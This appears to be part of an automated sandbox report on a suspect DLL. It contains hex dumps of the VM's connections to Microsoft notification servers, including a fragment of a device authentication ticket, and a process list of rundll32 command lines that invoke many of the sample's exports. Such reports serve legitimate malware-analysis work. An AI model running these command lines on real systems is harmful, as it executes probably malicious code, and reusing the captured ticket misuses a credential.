                            2024-07-25 15:55:26 UTC58INData Raw: 4d 53 2d 43 56 3a 20 31 63 5a 65 77 41 78 32 48 55 71 52 50 79 6e 44 4a 44 73 6c 2f 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                            Data Ascii: MS-CV: 1cZewAx2HUqRPynDJDsl/w.0Payload parsing failed.


                            Session IDSource IPSource PortDestination IPDestination Port
                            14192.168.2.64972540.113.110.67443
                            TimestampBytes transferredDirectionData
                            2024-07-25 15:55:53 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 57 75 6e 34 47 38 59 6b 4e 30 53 46 7a 50 72 63 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 39 63 62 31 31 66 65 34 31 66 65 32 62 65 31 0d 0a 0d 0a
                            Data Ascii: CNT 1 CON 305MS-CV: Wun4G8YkN0SFzPrc.1Context: 79cb11fe41fe2be1
                            2024-07-25 15:55:53 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                            2024-07-25 15:55:53 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 57 75 6e 34 47 38 59 6b 4e 30 53 46 7a 50 72 63 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 39 63 62 31 31 66 65 34 31 66 65 32 62 65 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 63 42 32 5a 68 6b 70 56 44 68 71 43 58 4d 2f 41 68 63 67 6b 4f 78 43 54 4a 6a 45 46 75 64 67 4a 35 66 46 38 48 65 63 52 6e 2b 57 54 32 54 34 37 7a 6d 63 77 51 62 62 43 6c 37 39 34 57 41 42 48 71 72 45 5a 67 74 46 71 35 53 6e 50 68 74 4b 41 4a 51 4d 46 2b 79 57 64 4a 6c 50 64 76 72 6c 6d 5a 69 68 72 34 72 4f 37 4b 4e 62 62
                            Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: Wun4G8YkN0SFzPrc.2Context: 79cb11fe41fe2be1<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZcB2ZhkpVDhqCXM/AhcgkOxCTJjEFudgJ5fF8HecRn+WT2T47zmcwQbbCl794WABHqrEZgtFq5SnPhtKAJQMF+yWdJlPdvrlmZihr4rO7KNbb
                            2024-07-25 15:55:53 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 57 75 6e 34 47 38 59 6b 4e 30 53 46 7a 50 72 63 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 39 63 62 31 31 66 65 34 31 66 65 32 62 65 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: Wun4G8YkN0SFzPrc.3Context: 79cb11fe41fe2be1<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            15192.168.2.64972540.113.110.674432144C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            2024-07-25 15:55:53 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                            Data Ascii: 202 1 CON 58
                            2024-07-25 15:55:53 UTC58INData Raw: 4d 53 2d 43 56 3a 20 4a 66 2f 72 69 6c 44 78 31 6b 36 44 33 54 55 56 48 36 53 43 4d 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                            Data Ascii: MS-CV: Jf/rilDx1k6D3TUVH6SCMA.0Payload parsing failed.


                            Session IDSource IPSource PortDestination IPDestination Port
                            16192.168.2.64972740.113.110.67443
                            TimestampBytes transferredDirectionData
                            2024-07-25 15:56:22 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 57 59 32 38 57 57 6c 4a 48 30 57 36 64 63 59 4c 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 39 64 63 32 37 32 39 31 31 36 35 32 64 65 39 0d 0a 0d 0a
                            Data Ascii: CNT 1 CON 305MS-CV: WY28WWlJH0W6dcYL.1Context: 39dc272911652de9
                            2024-07-25 15:56:22 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                            2024-07-25 15:56:22 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 57 59 32 38 57 57 6c 4a 48 30 57 36 64 63 59 4c 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 39 64 63 32 37 32 39 31 31 36 35 32 64 65 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 63 42 32 5a 68 6b 70 56 44 68 71 43 58 4d 2f 41 68 63 67 6b 4f 78 43 54 4a 6a 45 46 75 64 67 4a 35 66 46 38 48 65 63 52 6e 2b 57 54 32 54 34 37 7a 6d 63 77 51 62 62 43 6c 37 39 34 57 41 42 48 71 72 45 5a 67 74 46 71 35 53 6e 50 68 74 4b 41 4a 51 4d 46 2b 79 57 64 4a 6c 50 64 76 72 6c 6d 5a 69 68 72 34 72 4f 37 4b 4e 62 62
                            Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: WY28WWlJH0W6dcYL.2Context: 39dc272911652de9<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZcB2ZhkpVDhqCXM/AhcgkOxCTJjEFudgJ5fF8HecRn+WT2T47zmcwQbbCl794WABHqrEZgtFq5SnPhtKAJQMF+yWdJlPdvrlmZihr4rO7KNbb
                            2024-07-25 15:56:22 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 57 59 32 38 57 57 6c 4a 48 30 57 36 64 63 59 4c 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 39 64 63 32 37 32 39 31 31 36 35 32 64 65 39 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: WY28WWlJH0W6dcYL.3Context: 39dc272911652de9<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            17192.168.2.64972740.113.110.674432144C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            2024-07-25 15:56:22 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                            Data Ascii: 202 1 CON 58
                            2024-07-25 15:56:22 UTC58INData Raw: 4d 53 2d 43 56 3a 20 54 6e 4c 6e 62 38 36 6a 7a 55 4b 67 44 62 56 38 37 50 45 58 72 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                            Data Ascii: MS-CV: TnLnb86jzUKgDbV87PEXrw.0Payload parsing failed.


                            Session IDSource IPSource PortDestination IPDestination Port
                            18192.168.2.64973140.115.3.253443
                            TimestampBytes transferredDirectionData
                            2024-07-25 15:56:51 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 31 67 53 7a 47 33 44 30 4a 30 6d 76 77 35 31 33 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 34 64 39 32 61 37 62 65 61 65 32 30 61 35 38 0d 0a 0d 0a
                            Data Ascii: CNT 1 CON 305MS-CV: 1gSzG3D0J0mvw513.1Context: 94d92a7beae20a58
                            2024-07-25 15:56:51 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                            2024-07-25 15:56:51 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 31 67 53 7a 47 33 44 30 4a 30 6d 76 77 35 31 33 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 34 64 39 32 61 37 62 65 61 65 32 30 61 35 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 63 42 32 5a 68 6b 70 56 44 68 71 43 58 4d 2f 41 68 63 67 6b 4f 78 43 54 4a 6a 45 46 75 64 67 4a 35 66 46 38 48 65 63 52 6e 2b 57 54 32 54 34 37 7a 6d 63 77 51 62 62 43 6c 37 39 34 57 41 42 48 71 72 45 5a 67 74 46 71 35 53 6e 50 68 74 4b 41 4a 51 4d 46 2b 79 57 64 4a 6c 50 64 76 72 6c 6d 5a 69 68 72 34 72 4f 37 4b 4e 62 62
                            Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: 1gSzG3D0J0mvw513.2Context: 94d92a7beae20a58<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZcB2ZhkpVDhqCXM/AhcgkOxCTJjEFudgJ5fF8HecRn+WT2T47zmcwQbbCl794WABHqrEZgtFq5SnPhtKAJQMF+yWdJlPdvrlmZihr4rO7KNbb
                            2024-07-25 15:56:51 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 31 67 53 7a 47 33 44 30 4a 30 6d 76 77 35 31 33 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 34 64 39 32 61 37 62 65 61 65 32 30 61 35 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: 1gSzG3D0J0mvw513.3Context: 94d92a7beae20a58<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            19192.168.2.64973140.115.3.2534432144C:\Windows\SysWOW64\rundll32.exe
                            TimestampBytes transferredDirectionData
                            2024-07-25 15:56:51 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                            Data Ascii: 202 1 CON 58
                            2024-07-25 15:56:51 UTC58INData Raw: 4d 53 2d 43 56 3a 20 50 4c 31 55 4a 53 71 6a 54 55 79 45 75 63 47 52 43 54 4f 2b 62 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                            Data Ascii: MS-CV: PL1UJSqjTUyEucGRCTO+bQ.0Payload parsing failed.


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:11:54:11
                            Start date:25/07/2024
                            Path:C:\Windows\System32\loaddll32.exe
                            Wow64 process (32bit):true
                            Commandline:loaddll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll"
                            Imagebase:0x3a0000
                            File size:126'464 bytes
                            MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:1
                            Start time:11:54:11
                            Start date:25/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:3
                            Start time:11:54:11
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",#1
                            Imagebase:0x1c0000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:4
                            Start time:11:54:11
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe C:\Users\user\Desktop\LisectAVT_2403002B_14.dll,GnrkBltvkx
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:5
                            Start time:11:54:11
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",#1
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:6
                            Start time:11:54:14
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe C:\Users\user\Desktop\LisectAVT_2403002B_14.dll,GnrkBmoaar
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:7
                            Start time:11:54:17
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe C:\Users\user\Desktop\LisectAVT_2403002B_14.dll,GnrkCyrpw
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:8
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkBltvkx
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:9
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkBmoaar
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:10
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkCyrpw
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:11
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkZtdij
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:12
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkZewk
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:13
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkXzwnp
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:14
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkXalbb
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:15
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWyey
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:16
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWtlrh
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:17
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWsnq
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:18
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWapq
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:19
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkVnndq
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:20
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkUsmc
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:21
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTrg
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:22
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTjxdo
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:23
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTch
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:24
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTcfv
